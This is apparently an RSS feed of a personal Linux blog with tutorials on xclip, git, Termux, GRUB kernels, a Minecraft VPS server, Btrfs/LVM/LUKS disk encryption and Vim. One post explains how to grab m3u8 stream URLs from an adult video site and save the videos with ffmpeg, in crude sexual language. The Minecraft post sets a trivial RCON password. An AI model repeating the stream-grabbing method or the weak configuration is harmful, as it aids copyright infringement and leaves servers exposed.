Copying text to the clipboard in Linux can be done efficiently using the `xclip` command-line utility. `xclip` allows you to manipulate the clipboard content, making it a handy tool for working in a terminal environment. In this article, we&apos;ll explore how to copy the contents of a file into the clipboard using `xclip`.

## Installing xclip

Before using `xclip`, ensure that it&apos;s installed on your Linux system. You can install it using your package manager. For example, if you&apos;re using pacman, the package manager for Arch Linux and its derivatives, run the following command:

```bash
sudo pacman -S xclip
```

Replace this with the appropriate command if you&apos;re using a different package manager.

## Copying File Contents to Clipboard

To copy the contents of a file into the clipboard, you can use the following `xclip` command:

```bash
xclip -sel c &lt; file_to_copy
```

Here, `file_to_copy` is the name of the file you want to copy. This command takes the content of the specified file and sends it to the clipboard.

Let&apos;s break down the components of the command:

- `xclip`: The main command for interacting with the X clipboard.
- `-sel c`: Specifies the selection type. In this case, it uses the &quot;clipboard&quot; selection. The clipboard is the part of the X server that deals with copy and paste operations.
- `&lt; file_to_copy`: Redirects the content of the specified file into the `xclip` command.

## Example Usage

Suppose you have a text file named `sample.txt`, and you want to copy its content to the clipboard. Here&apos;s how you would do it:

```bash
xclip -sel c &lt; sample.txt
```

After running this command, the content of `sample.txt` is now in your clipboard and ready to be pasted.

## Conclusion

Using `xclip` in Linux simplifies the process of copying file contents to the clipboard, especially when working in a terminal environment. Remember to adapt the command to your specific use case, and explore other features of `xclip` for more clipboard manipulation options.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Git: Wayback Commands</title><link>https://ummit.dev//posts/linux/tools/git/git-wayback-command/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/git/git-wayback-command/</guid><description>Essential Git commands for undoing commits, resetting changes, and managing repository history effectively.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Overview

Git, the powerful version control system, is an indispensable tool for developers. Understanding its commands and workflows can greatly enhance your efficiency and productivity. In this blog, we&apos;ll explore some common and essential Git commands for various scenarios.

## 1. Undoing Commits: `git reset HEAD~`

Imagine making a commit that you want to undo. The `git reset HEAD~` command allows you to reset the current branch&apos;s HEAD to the previous commit, effectively `undoing` the last commit. Use this cautiously, especially if you&apos;ve already pushed changes.

```bash
git reset HEAD~
```

## 2. Force Pushing: `git push origin branch --force`

Force pushing is necessary when you&apos;ve made changes locally that conflict with the remote repository. This overwrites the remote branch with your local changes. Exercise caution with this command, especially on shared branches.

```bash
git push origin dev --force
```

## 3. Amending Commits: `git commit --amend`

The `--amend` option is used to modify the last commit. It combines staged changes with the previous commit, effectively allowing you to alter the commit message or add changes you forgot.

```bash
git commit --amend
```

This command opens your default text editor, allowing you to modify the commit message or save without changes. It combines staged changes with the previous commit.

## 4. Viewing Commit History

To view a concise history of commits, use:

```shell
git log --oneline
```

This displays a list of commits, showing only the commit hash and commit message.

## 4. Hard Reset: `git reset --hard &lt;commit-hash&gt;`

A hard reset discards changes and moves the HEAD to a specific commit (hash). Use this when you want to discard all changes and move to a previous state.

```bash
git reset --hard c14809fa
```

## 5. Stashing Changes: `git stash`

Stashing is handy when you need to switch branches but have uncommitted changes. It saves your changes in a temporary area, allowing you to switch branches without committing.

```bash
git stash
```

## 6. Stashing Untracked Files: `git stash -u`

The `-u` option with `git stash` stashes untracked files along with changes. This is useful when you want to stash everything, including new files.

```bash
git stash -u
```

## Conclusion

These commands are foundational for effective Git workflows. However, exercise caution when using forceful commands, especially in shared repositories. Always ensure you understand the consequences of each command, and consider creating backups or branches before making significant changes. :DD</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Termux on Android: A Comprehensive Guide</title><link>https://ummit.dev//posts/mobile/android/tools/termux/</link><guid isPermaLink="true">https://ummit.dev//posts/mobile/android/tools/termux/</guid><description>Install and use Termux terminal emulator on Android for Linux-like command-line experience on mobile devices.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Overview

Termux is a powerful terminal emulator for Android that brings a Linux-like command-line experience to your mobile device. In this guide, we&apos;ll walk through the installation process using F-Droid, setting up storage access, and exploring the basic functionality of Termux.

## Installing Termux from F-Droid

To install Termux on your Android device, follow these steps:

1. **Install F-Droid**: F-Droid is an open-source app store that hosts a variety of free and open-source applications, including Termux. You can do this by downloading the F-Droid APK from the [official website](https://f-droid.org/) and installing it on your device. or you can download it from [here](https://f-droid.org/F-Droid.apk).

2. **Search for Termux**: Once F-Droid is installed, open it and search for `Termux` and install it.

3. **Grant Permissions**: After the installation is complete, launch Termux. You will be prompted to grant storage access. Allow them to proceed.

4. **Storage Access**: To access your device&apos;s storage from Termux, you need to grant permission. Run the following command in Termux :)

    ```bash
    termux-setup-storage
    ```

    Confirm the permission request when prompted.

## Getting Started with Termux

Now that you have Termux installed and storage access configured, you can start using it as a powerful terminal on your Android device. Here are some tips to help you get started.

### Basic Commands

Termux use the package manager `pkg` or `apt` or `apt-get` to install and manage software packages.

Here are some basic commands to get you started:

- **Update Package List:**
    ```bash
    pkg update
    ```

- **Install a Package:**
    ```bash
    pkg install &lt;package_name&gt;
    ```

- **Accessing Storage**: With `termux-setup-storage`, you have granted access to your device&apos;s storage. You can navigate to the storage directory using the `cd` command:

    ```bash
    cd storage/shared
    ls
    ```

- **Full system upgrade**: in termux, we dont need to using sudo to upgrade system.

    ```bash
    apt update -y &amp;&amp; apt upgrade -y &amp;&amp; apt dist-upgrade -y
    ```

## Conclusion

Actually you can even install a full Linux distribution on your Android device using Termux and launch it using a VNC client. Termux is a versatile tool that can be used for various purposes, from running scripts to setting up a web server. It&apos;s a must-have app for anyone who wants to explore the world of command-line interfaces on their Android device.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Installing Multiple Kernels with GRUB on Arch Linux</title><link>https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-kernel/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/boot-loader/grub/grub-multi-kernel/</guid><description>Install and manage multiple Linux kernels on Arch Linux with GRUB bootloader for flexibility and compatibility.</description><pubDate>Mon, 25 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Overview

GRUB (Grand Unified Bootloader) is a popular bootloader used on many Linux distributions, including Arch Linux. Installing multiple kernels alongside GRUB allows you to choose which kernel version to boot into, providing flexibility and compatibility. In this guide, we&apos;ll walk through the process of installing multiple kernels on Arch Linux.

## Step 1: Install Kernels

Open your terminal and install the desired kernel versions. In this example, we&apos;ll install the regular Linux kernel, the LTS (Long-Term Support) kernel, and the Zen kernel.

```bash
sudo pacman -S linux linux-headers
sudo pacman -S linux-lts linux-headers
sudo pacman -S linux-zen linux-headers
```

These commands install the Linux, Linux LTS, and Linux Zen kernels along with their respective headers.

## Step 2: Generate GRUB Configuration

After installing the kernels and GRUB, generate the GRUB configuration file to include the new kernels:

```bash
sudo grub-mkconfig -o /boot/grub/grub.cfg
```

This command scans your system for installed kernels and generates a configuration file (`grub.cfg`) in the `/boot/grub/` directory.

## Step 3: Reboot

Reboot your system to apply the changes:

```bash
reboot
```

During the boot process, you&apos;ll now see a GRUB menu that allows you to choose the kernel version you want to boot into.

## Selecting Kernel during Boot

When your system starts, GRUB presents a menu where you can choose the kernel you want to boot. Use the arrow keys to navigate and press Enter to select a kernel.

## Conclusion

Installing multiple kernels on Arch Linux with GRUB provides a safety net in case a new kernel version introduces compatibility issues. It allows you to choose a specific kernel version during the boot process, ensuring that you can always access your system. Experiment with different kernels to find the one that works best for your hardware and requirements.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Crash Guide to Bypassing HLS Encryption video with FFMPEG</title><link>https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-dl-encrypted-hls-video/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/ffmpeg/ffmpeg-dl-encrypted-hls-video/</guid><description>Learn how to bypass HLS encryption and download videos using FFMPEG directly from the browser.</description><pubDate>Sun, 24 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

First of all, a very MERRY CHRISTMAS to everyone! 🎄🎁

As we embrace the festive spirit, this article kicks off with a practical guide, a valuable method to master when it comes to downloading videos.

we&apos;ll walk you through a direct approach using FFMPEG. Let&apos;s unwrap the steps!

## Required Tools

Before we dive in, ensure you have the following tools ready:

- `FFMPEG` (for seamless file transfer)
- Terminal (for executing commands)
- Browser (for extracting the essential URL)

### Arch Linux Users: Installing FFMPEG

```shell
sudo pacman -S ffmpeg
```

## Step 1: Uncover M3U8 Link and Copy It

Quick guidance:

1. Open your preferred browser.
2. Press `F12` (Inspect) on your keyboard.
3. Navigate to the `Network` tab.
4. Head over to the enchanting world of `Jable.tv`.
5. Find the video you gonna to jerk off :P
6. Type `m3u8` into &apos;Filter URLs&apos; to swiftly spot the URL. Once found, copy the M3U8 link.

### Can&apos;t Locate the URL?

If the M3U8 link eludes you, it could be a missed step. Try refreshing the URL with F5, replay the video, and you&apos;re sure to uncover it. Utilize the `Filter` feature with the value `m3u8` for efficient searching.

![find](./1.gif)

## Step 2: Spark the Video Download

When you spot `[https @ 000001947ece8180] Opening &apos;https://qmm-truts.mushroomtrack.com/hls/NFb_sIwTdg3IZ6FeEFo9-g/1656586701/0/108/1082.ts&apos; for reading`, rejoice! The reading is successful, and the download is underway.

```shell
ffmpeg -user_agent &quot;Mozilla/5.0 (Macintosh; Intel Mac OS X 11_1_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36&quot; -headers &quot;referer: https://jable.tv/&quot; -i &quot;https://qmm-truts.mushroomtrack.com/hls/NFb_sIwTdg3IZ6FeEFo9-g/1656586701/0/108/108.m3u8&quot; -c copy IPX-258.mp4
```

![find](./downloaded.png)

## Step 3: Download Enchantment - A Few Notes

While the download enchants your screen, you&apos;ll witness more files named `IPX-258.mp4`. Don&apos;t be fooled, it&apos;s still waltzing into your device. Resist the urge to close the terminal midway; otherwise, you might need to restart. The download might conclude at a specific time or when the enchantment feels just right.

### Full Download Demo Code (CAWD-091)

For those seeking a mesmerizing HLS video download, behold the sample code:

```shell
ffmpeg -user_agent &quot;User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0&quot; -headers &quot;Referer: https://jable.tv/&quot; -i &quot;https://record-smart.alonestreaming.com/hls/Jyz4bZStuyQzFk6168lSdA/1656587266/8000/8688/8688.m3u8&quot; -c copy CAWD-091.mp4
```

## Conclusion

Now you can jerking off with your videos without any hassle. Enjoy your porn! 🍆💦</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>A Comprehensive Guide for Setting Up a Minecraft Server</title><link>https://ummit.dev//posts/games/minecraft/via-vps-creating-your-own-24hr-minecraft-server/</link><guid isPermaLink="true">https://ummit.dev//posts/games/minecraft/via-vps-creating-your-own-24hr-minecraft-server/</guid><description>Step-by-step guide to setting up and running a 24/7 Minecraft Java Edition server on VPS.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Running a Minecraft server on a VPS (Virtual Private Server) allows you to create a shared gaming experience for you and your friends. This guide covers the step-by-step process of setting up a Minecraft server on a VPS, focusing on key tools and configurations.

### Prerequisites:

- VPS Server with a minimum of 2GB RAM.
- SSH (Secure Shell) connection tool.
- Optional: Filezilla or SCP for file transfers.
- Java Edition server for Minecraft.
- Screen for running the server in the background.

## Step 1: Install SSH Connection Tool

Ensure that you have an SSH connection tool installed. Most Linux systems come with an SSH connection tool by default. If not, install it using the appropriate command for your system.

**Debian:**
```bash
sudo apt-get install ssh -y
```

**Arch:**
```bash
sudo pacman -S ssh
```

**Fedora:**
```bash
sudo dnf install ssh
```

## Step 2: Log in to the SSH Server

Use the IP address of your VPS server to log in using SSH. Replace `your_server_Ip` with the actual IP address.

```bash
ssh root@your_server_Ip
```

## Step 3: Accept Port 22

Some VPS providers may deny port 22 by default. To prevent login issues in the future, accept connections on Port 22:

```bash
iptables -A INPUT -p tcp --dport 22 -j ACCEPT
```

## Step 4: Update Package

Before installation, update the system&apos;s package information:

```bash
sudo apt update -y
sudo apt upgrade -y
sudo apt dist-upgrade -y
```

## Step 5: Install Java JDK

Install OpenJDK version 17, suitable for running Minecraft servers:

```bash
sudo apt install openjdk-17-jre-headless -y
```

## Step 6: Install Screen

Install Screen to run the server in the background:

```bash
sudo apt install screen -y
```

## Step 7: Download the Latest Minecraft Server

Download the latest Minecraft server file using `wget` or from the official website:

```bash
wget https://launcher.mojang.com/v1/objects/e00c4052dac1d59a1188b2aa9d5a87113aaf1122/server.jar
```

## Step 8: Set Up Firewall

Use `ufw` to enable and configure the firewall:

```bash
ufw enable
sudo ufw allow 25565
```

## Step 9: Start the Server

Run the Minecraft server with the following command:

```bash
java -Xms1024M -Xmx1024M -jar server.jar nogui
```

## Step 10: Server Error

After the first run, you may encounter errors related to missing files. This is normal. The next steps will generate and modify the required files.

```bash
Starting net.minecraft.server.Main
[14:01:39] [ServerMain/INFO]: Building unoptimized datafixer
[14:01:42] [ServerMain/ERROR]: Failed to load properties from file: server.properties
[14:01:42] [ServerMain/WARN]: Failed to load eula.txt
[14:01:42] [ServerMain/INFO]: You need to agree to the EULA in order to run the server. Go to eula.txt for more info.
```

## Step 11: Modify eula.txt File

Edit `eula.txt` to change `eula=false` to `eula=true`:

```bash
nano eula.txt
```

## Step 12: Modify server.properties File

Edit `server.properties` to configure your server settings:

```bash
nano server.properties
```

Now you made the following changes, For instances:

```bash
rcon.port=25575
rcon.password=hi
enable-rcon=true
```

## Step 13: Use Screen to Keep the Server Running

Use `screen` to keep the server running in the background:

```bash
screen
java -xms1024m -xmx2048m -jar Server.jar NOGUI
```

## Final Step: Enter Minecraft and Join the Server

1. Open Minecraft and go to &quot;multiplayer game.&quot;
2. Add your server&apos;s IP and click &quot;finish.&quot;
3. Click on your server and join. Enjoy the game!

![gameplay](./featured.png)

## Conclusion

Setting up a Minecraft server on a VPS provides a shared gaming environment for you and your friends. Following these steps ensures a smooth installation and configuration process. Enjoy your Minecraft adventure!

## References:

- [Shells Tutorial](https://www.shells.com/l/en-s/tutorial/0-guide-nstalling-A-linecraft-linux-ubuntu)
- [DigitalOcean Tutorial](https://www.digitalocean.com/community/tutorials/how-create-A--mincraft--ubuntu-20-04-tutorials)
- [Minecraft Server Error Fix](https://www.reddit.com/r/minecraft/comments/nv92fg/error_while_launcher_a_117_minecraft_server_fix/)

## File Download Websites:

- [Minecraft Versions](https://mcversions.net/)
- [Official Minecraft Server Download](https://www.minecraft.net/en-s/download/server)

## Author&apos;s Note

I am not a Minecraft player, and I only started playing it last month. I have previously hosted a CS1.6 Server, and I thought it might be similar, but I encountered various problems while writing this article. The main issue was that I couldn&apos;t run Minecraft due to insufficient RAM. I initially tried using 512MB of RAM, but it wasn&apos;t sufficient. Realizing the RAM was inadequate, I attempted again, this time upgrading to 1GB of RAM, but it still didn&apos;t work. Although the error messages were minor, a new error occurred after the last step. Finally, I used 2GB of RAM, and there were no more errors.

Minecraft really resource-intensive and expensive.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Resizing LVM and LUKS Encrypted Btrfs Filesystem</title><link>https://ummit.dev//posts/linux/filesystem/lvm-luks-resizing-btrfs/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/filesystem/lvm-luks-resizing-btrfs/</guid><description>Learn how to safely resize Btrfs filesystems within LVM and LUKS encrypted storage setups.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

Managing disk space efficiently is crucial for maintaining a well-organized system. In this guide, we&apos;ll explore the steps to resize a Btrfs filesystem within an LVM and LUKS encrypted setup. This process involves reducing, extending, and fixing the size of the filesystem to meet your storage needs.

Also, Btrfs enables you to resize the filesystem online without disruption. Alternatively, you might need to create a bootable ISO using a live-ISO and then initiate the resizing of the filesystem.

### Prerequisites

Before proceeding, ensure you have a basic understanding of LVM (Logical Volume Manager) and LUKS (Linux Unified Key Setup) encryption.

&gt;**And backup your DATA First!!!!!**

## Step 1: Reduce Btrfs Filesystem

To reduce the size of the Btrfs filesystem, use the `btrfs filesystem resize` command. Make sure to specify the target size and the mount point.

```bash
sudo btrfs filesystem resize -500G /mnt/home
```

Here, we reduce the filesystem mounted at `/mnt/home` by 500GB. Adjust the size as needed for your scenario.

## Step 2: Reduce LVM Logical Volume

To match the reduced Btrfs filesystem size, you must shrink the corresponding LVM logical volume. Use the `lvreduce` command, specifying the new size and the path to the logical volume.

```bash
sudo lvreduce -L 500G /dev/vol/home
```

Replace `/dev/vol/home` with the path to your logical volume. This step ensures that the LVM logical volume aligns with the resized Btrfs filesystem.

## Step 3: Extend LVM Logical Volume

If you need to revert the changes or allocate additional space to the filesystem, use the `lvextend` command. This command allows you to increase the size of the LVM logical volume.

```bash
sudo lvextend -l +100%FREE /dev/vol/home
```

Here, we extend the logical volume to utilize all available free space. Adjust the logical volume path as needed.

## Step 4: Verification

To verify the changes, use the following commands:

- Verify Btrfs filesystem size:

```bash
sudo btrfs filesystem df /mnt/home
```

- Verify LVM logical volume size:

```bash
sudo lvdisplay /dev/vol/home
```

Ensure that the sizes align with your expectations.

## Conclusion

Resizing a Btrfs filesystem within an LVM and LUKS encrypted setup requires a careful and systematic approach. By following these steps, you can efficiently manage your storage space, whether you need to reduce, extend, or fix the size of the filesystem. Always double-check the sizes and perform these operations with caution to avoid data loss.</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Full Disk Encryption with GRUB and Including /boot: Step-by-Step Guide</title><link>https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks1-grub-encryption-fully-install-systemd/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/distribution/archlinux/archlinux-luks1-grub-encryption-fully-install-systemd/</guid><description>Complete Arch Linux installation guide with full disk encryption using LUKS2, LVM, and GRUB bootloader.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>&gt; **Note:** This is an updated installation method for the latest Arch Linux install.

## Guys! Arch Got an Update

**2026-01-13 12:00:00**

Today, I updated my Arch installation with a fresh install, but I encountered an issue where it gets stuck at loading `/dev/mapper/vol-root`. I did some research and asked my friends who use full disk encryption about it.

During that time, I learned that Arch recently updated something very important for FDE users. Here is the latest version of how to install with FDE on Arch.

For the lastest reference link please see:

https://wiki.archlinux.org/title/Dm-crypt/System_configuration#rd.luks.name

## Introduction

Since systemd-boot doesn&apos;t support encrypted `/boot`, GRUB does. There are not so good points though, like only argon2id are not supported.

&gt;Warning: GRUB&apos;s support for LUKS2 is still limited. You skill need to use LUKS2 with PBKDF2. inorder it boot are working.

### Step 1: Encrypt the Disk

To begin, encrypt your disk using the LUKS format, so avoid using certain options:

```shell
cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha512 --pbkdf pbkdf2 --iter-time 5000 --key-size 512 --use-urandom --verify-passphrase /dev/nvme0n1p2
```

Ensure you answer `YES` when prompted. GRUB doesn&apos;t support the `--pbkdf argon2id` option, so it&apos;s crucial to stick to LUKS1 for compatibility.

### Step 2: Open LUKS Device and Set Up Logical Volumes

After formatting, open the LUKS device and set up logical volumes using LVM (Logical Volume Manager):

```shell
cryptsetup open /dev/nvme0n1p2 crypt # Decrypting disk and create mapper named &apos;crypt&apos;

pvcreate /dev/mapper/crypt # Create physical volume named &apos;crypt&apos;
vgcreate vol /dev/mapper/crypt # Create volume group named &apos;vol&apos;

lvcreate -l 3%FREE vol -n swap # Create logcial volume and set this size uses 3% of this partition and named to swap.
lvcreate -l 50%FREE vol -n root # Create logcial volume and set this size uses 50% of this partition and named to root.
lvcreate -l 100%FREE vol -n home # Create logcial volume and set this size uses 100% of this partition and named to home.
```

Format the root and home volumes:

```shell
mkfs.btrfs /dev/vol/root
mkfs.btrfs /dev/vol/home
```

Create swap space:

```shell
mkswap /dev/vol/swap
swapon /dev/vol/swap
```

Mount the volumes:

```shell
mount /dev/vol/root /mnt
mkdir /mnt/home
mount /dev/vol/home /mnt/home
```

### Step 3: Prepare for GRUB Installation

Since GRUB supports EFI systems, mount the EFI system partition:

```shell
mkfs.fat -F32 /dev/nvme0n1p1
mount /dev/nvme0n1p1 --mkdir /mnt/boot/efi
```

Now, proceed with the essential package installations:

```shell
pacstrap -i /mnt base base-devel linux linux-firmware linux-headers lvm2 vim neovim networkmanager pipewire
```

Generate the `/etc/fstab` file:

```shell
genfstab -U /mnt &gt;&gt; /mnt/etc/fstab
```

The process of installing Arch Linux is the same as that of ArchLinux!

If you are unfamiliar with the process, please refer to this article:

[Complete Guide to setting up LUKS on LVM encryption in Arch Linux (Minimal System)](/posts/linux/distribution/archlinux/archlinux-luks-encryption-fully-install-systemd)

### Step 4: Configure mkinitcpio.conf

Edit the `/etc/mkinitcpio.conf` file, ensuring that the `HOOKS` line includes `lvm2` and `sd-encrypt`. It should look like this. Or you can just directly copy this line.

```shell
HOOKS=(systemd autodetect microcode modconf kms keyboard keymap sd-vconsole sd-encrypt block lvm2 filesystems fsck)
```

Save the changes. Now add a file because this causes the error:

`==&gt; ERROR: file not found: &apos;/etc/vconsole.conf&apos;`

```shell
echo &quot;KEYMAP=us&quot; &gt; /etc/vconsole.conf
```

And now regenerate the configuration:

```shell
mkinitcpio -P
```

### Step 5: Install and Configure GRUB

Install GRUB and efibootmgr:

```shell
pacman -S grub efibootmgr
```

Configure the GRUB file:

```shell
nvim /etc/default/grub
```

Fist, (get UUID using `blkid /dev/nvme0n1p2`):

Edit `GRUB_CMDLINE_LINUX_DEFAULT`

```shell
GRUB_CMDLINE_LINUX_DEFAULT=&quot;rd.luks.name=&lt;Your_M.2_UUID&gt;=crypt root=/dev/mapper/vol-root&quot;
```

and set `GRUB_ENABLE_CRYPTODISK` to `y`.

Install GRUB:

```shell
grub-install --recheck /dev/nvme0n1p1
```

Generate the GRUB configuration:

```shell
grub-mkconfig -o /boot/grub/grub.cfg
```

### Step 6: Reboot and Decrypt

Reboot your system. You&apos;ll notice that GRUB prompts you to enter the passphrase or password for decryption. After successfully decrypting, you&apos;ll encounter another decryption prompt for your volume disk.

&gt;Note: The decryption process may take some time, and entering the wrong passphrase will lead to a GRUB rescue mode. you need to reboot and try again.

### Reboot

After completing these steps, Now exit your current user then umount your arch system. You can enjoy your new Arch Linux system with LUKS encryption. (But no GUI XD)

```shell
exit
umount -R /mnt
```

## References

- [Alpine Linux with Full Disk Encryption](https://battlepenguin.com/tech/alpine-linux-with-full-disk-encryption/)
- [[SOLVED] Grub with lvm on LUKS -&gt; rescue mode. Incomplete grub.cfg?](https://bbs.archlinux.org/viewtopic.php?id=246628)
- [Arch Linux | LVM on LUKS with GRUB | Encrypted Installation](https://invidious.einfachzocken.eu/watch?v=FcNQQxtPA0A)
- [Encrypted /boot](https://wiki.archlinux.org/title/GRUB#Encrypted_/boot)
- [dm-crypt/Encrypting an entire system](https://wiki.archlinux.org/title/Dm-crypt/Encrypting_an_entire_system)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Vim: Quick Guide</title><link>https://ummit.dev//posts/linux/tools/terminal/vim/vim-guide/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/tools/terminal/vim/vim-guide/</guid><description>Comprehensive Vim editor guide covering modes, essential commands, and advanced features for efficient text editing.</description><pubDate>Thu, 21 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

vim is a powerful text editor that extends the functionality of Vim, providing an enhanced experience for text editing and coding. If you&apos;re new to vim or looking to master its capabilities, this guide will walk you through the fundamental modes, commands, and features.

## Understanding Modes

vim operates in different modes, each serving a specific purpose. Familiarizing yourself with these modes is essential for efficient text editing.

### Normal Mode (Esc)

Normal mode is the default mode where you navigate, manipulate text, and execute commands.

- **Navigation:**
  - `h`, `j`, `k`, `l`: Move left, down, up, and right respectively.
  - `w`, `b`: Move forward or backward by a word.
  - `0`, `$`: Move to the beginning or end of a line.

- **Manipulation:**
  - `x`: Delete the character under the cursor.
  - `dd`: Delete the current line.
  - `yy`: Copy the current line.
  - `p`: Paste after the cursor.
  - `u`: Undo the last action.
  - `Ctrl-r`: Redo.

- **Searching:**
  - `/`: Enter search mode.

### Insert Mode (i)

In insert mode, you can directly type and edit text.

- **Enter Insert Mode:**
  - `i`: Insert before the cursor.
  - `I`: Insert at the beginning of the line.
  - `a`: Insert after the cursor.
  - `A`: Insert at the end of the line.

- **Exit Insert Mode:**
  - `Esc`: Return to normal mode.

### Visual Mode (v)

Visual mode allows you to select and manipulate text.

- **Enter Visual Mode:**
  - `v`: Start character-wise visual mode.
  - `V`: Start line-wise visual mode.

- **Manipulate Selected Text:**
  - `d`: Delete the selected text.
  - `y`: Copy the selected text.
  - `c`: Change the selected text.

## Essential Commands

Learn these essential commands to streamline your vim experience.

- `:%d`: Delete all content.
- `:%y+`: Copy all content.
- `:w`: Save changes.
- `:q`: Quit (close the current file).
- `:wq`: Save and quit.

## Advanced Features

Unlock the full potential of vim with advanced features.

- **Multiple Windows:**
  - `:sp`: Split the window horizontally.
  - `:vsp`: Split the window vertically.
  - `Ctrl-w` + `h`, `j`, `k`, `l`: Navigate between windows.

- **File Navigation:**
  - `:e &lt;filename&gt;`: Open a file.
  - `:b &lt;buffer&gt;`: Switch between buffers.
  - `:ls`: List open buffers.

- **Search and Replace:**
  - `:s/foo/bar/g`: Replace all occurrences of &quot;foo&quot; with &quot;bar&quot; in the current line.
  - `:%s/foo/bar/g`: Replace all occurrences in the entire file.

- **Delete specific text:**
  - `:%s/foo//g`: Deleting all occurrences of &quot;foo&quot; in the entire file.

- **Autocomplete with Plugins:**
  - Install plugins like [coc.nvim](https://github.com/neoclide/coc.nvim) for autocompletion.

## Conclusion

As a Linux user, mastering a terminal-based text editor is essential. If you&apos;ve become adept at Vim, you&apos;re a true Vim hacker—whether it&apos;s Vi, Vim, or Neovim! :D

In terms of skills, not many people have mastered Linux, let alone Vim. Although there are text editors like Nano, they lack the robust features of Vim or Neovim, making them less powerful options.

Just like Windows Notepad and Notepad++, Notepad serves as the default text editor on Windows, but it&apos;s essentially a basic text editor. It lacks the comprehensive features to function like an integrated development environment (IDE).

So, I highly recommend learning Vi, Vim, Neovim, or Emacs as your daily file editor. Once you master them, you&apos;ll experience a significant change. Your computer skills will level up considerably.

Leave GUI programs aside and delve into terminal-based tools to elevate your computer skills and become proficient in the art of terminal hacking.

## Reference

- [Find and Replace Text in Vim](https://linuxhandbook.com/find-replace-vim/)</content:encoded><author>UmmIt Kin &lt;root@ummit.dev&gt;</author></item><item><title>Encrypt and Decrypt Your Internal Disk with an Existing Decrypted Filesystem Inside Keyfile</title><link>https://ummit.dev//posts/linux/system/harddisk/encrypt-and-decrypt-your-internal-disk-with-an-existing-decrypted-filesystem-inside-keyfile/</link><guid isPermaLink="true">https://ummit.dev//posts/linux/system/harddisk/encrypt-and-decrypt-your-internal-disk-with-an-existing-decrypted-filesystem-inside-keyfile/</guid><description>Set up automatic disk encryption and decryption using LUKS with keyfile-based authentication on Linux.</description><pubDate>Fri, 08 Dec 2023 00:00:00 GMT</pubDate><content:encoded>## Introduction

In the previous article, I demonstrated how to auto-mount an internal disk during system boot-up. In this article, I&apos;ll guide you through the process of encrypting your internal disk using LUKS.

This method involves decrypting your first disk, locating the keyfile on that disk, and using it to decrypt subsequent disks. Thus, you&apos;ll need to decrypt the first disk to decrypt your internal disk. This ensures that the keyfile is stored on your first disk, preventing them from being separated.

In summary, this method uses both a passphrase and a keyfile for disk decryption. The keyfile is stored on your system.

### Compatibility

Before proceeding, ensure you&apos;ve backed up all data on your internal disk, as the upcoming command will overwrite all data. Also, verify compatibility:

- The target disk is already fully encrypted.
- You want to encrypt an internal disk.

### What It Does

- Encrypts by passphrase and keyfile.
- Requires both passphrase and keyfile for decryption.
- Allows decryption using the keyfile.

## Step 1: Switch to Root User

Since all operations require root permissions, switch to the root user to expedite the process.

```shell
su
```

## Step 2: Identify Your Disk

To check which disk you&apos;re targeting for encryption, enter the following command:

```shell
lsblk
```

## Step 3: Create File System

Linux requires a GPT table for disks. Use `gdisk` to create the GPT table and format the file system. After marking the target disk, process the `gdisk` for this disk:

```shell
gdisk /dev/sda
o
y
n
enter
enter
enter
enter
p (ensure the file system is correct)
w
y
```

After this process, a file system will be created on `/dev/sda1`.

## Step 4: CryptLUKS Setup

Now, let&apos;s encrypt the disk using `cryptsetup`:

```shell
cryptsetup luksFormat --type luks2 --cipher aes-xts-plain64 --hash sha256 --iter-time 10000 --key-size 256 --pbkdf argon2id --use-urandom --verify-passphrase /dev/sda1

YES
```

## Step 5: Decrypt LUKS

This command will encrypt the disk and map it to a name, such as `4tbhdd`.

```shell
cryptsetup open /dev/sda1 4tbhdd
```

When using the cryptsetup luksOpen command to unlock the LUKS encryption device, the `/dev/mapper/` name assigned to the mapped device is determined by the `open` command. and the name can be changed as needed.

## Step 6: Create File System

As we have created a new mapper for the encrypted disk (`4tbhdd`), we also need to create a file system on this mapper. Execute the following command to accomplish this:

```shell
mkfs.btrfs /dev/mapper/4tbhdd
```

This command initializes a Btrfs file system on the specified mapper, ensuring that the encrypted disk is ready for use.

## Step 7: Create Keyfile

Now, create a keyfile that will be imported into your previously decrypted disk, enhancing the security of your setup.

```shell
dd if=/dev/urandom of=/root/keyfile bs=10000 count=819
```

## Step 8: Set the Permission of Keyfile

Set the permissions for the keyfile to ensure only the root user can access it, enhancing security.

```shell
chmod 0400 /root/keyfile
```

## Step 9: Add Keyfile to LUKS Device

Add the keyfile to the LUKS device to reinforce security and enable decryption.

```shell
cryptsetup luksAddKey /dev/sda1 /root/keyfile
```

## Step 10: Get the UUID of LUKS

Retrieve the UUID of the LUKS device for the next steps by running the following command:

```shell
cryptsetup luksUUID /dev/sda1
```

### Add to crypttab

